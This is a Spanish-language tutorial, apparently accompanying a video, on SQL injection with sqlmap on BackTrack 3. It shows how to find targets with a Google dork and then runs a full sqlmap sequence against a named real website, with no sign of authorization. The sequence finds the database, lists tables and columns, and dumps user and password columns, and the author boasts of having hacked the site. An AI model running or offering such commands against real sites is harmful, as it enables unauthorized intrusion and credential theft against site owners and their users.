SQL Injection con SQLMap en BackTrack 3
En este video les mostrare como hacer una inyección SQL.
- Programa: SQLMap
- Sistema Operativo: BackTrack 3
- Virtualizado con: Virtual Box 5.0
Pasos a Seguir
- Primero debemos de buscar un sitio vulnerable. Usualmente estan en php y utilizan parametros. Una forma muy sencilla de encontrarlos es usando en google la busqueda de dorking siguiente: inurl:php?id=, de esta forma buscaremos todos los sitios que en la url sean de php y contengan el parámetro id.

- En mi caso yo encontre el sitio: www.bible-history.com/subcat.php?id=22.
- Esto es a pura prueba y error ya que no solo por tener ese parametro son vulnerables.
- Ahora en Backtrack3 corremos el siquiente comando: cd /pentest/database/sqlmap. Esto es para ir a la carpeta donde esta SQLMap.
- Ahora el comando: ./sqlmap.py -u www.bible-history.com/subcat.php?id=22. Aqui ponemos la url vulnerable.
- Ahora el comando: ./sqlmap.py -u www.bible-history.com/subcat.php?id=22 --current-db.
- Esto es para ver la base de datos actual.
- Tambien nos muestra el SGBD y la version de la base de datos utilizada.
- En este sitio la base de datos se llama "bible_history"
- Ahora el comando: ./sqlmap.py -u www.bible-history.com/subcat.php?id=22 -D bible_history --tables.
- Esto es para ver todas las tablas de la base de datos actual. En mi caso la base de datos es bible_history.
- Ahora el comando: ./sqlmap.py -u www.bible-history.com/subcat.php?id=22 -D bible_history -T tabla --columns.
- esto es para ver todas las columnas de esa tabla.
- Ahora el comando: ./sqlmap.py -u www.bible-history.com/subcat.php?id=22 -D bible_history -T tabla -C id,user,password --dump
- Esto es para seleccionar todas las columnas que querramos de esa tabla.
- Listo!!! Ya hackeamos toda la historia de la Biblia!!!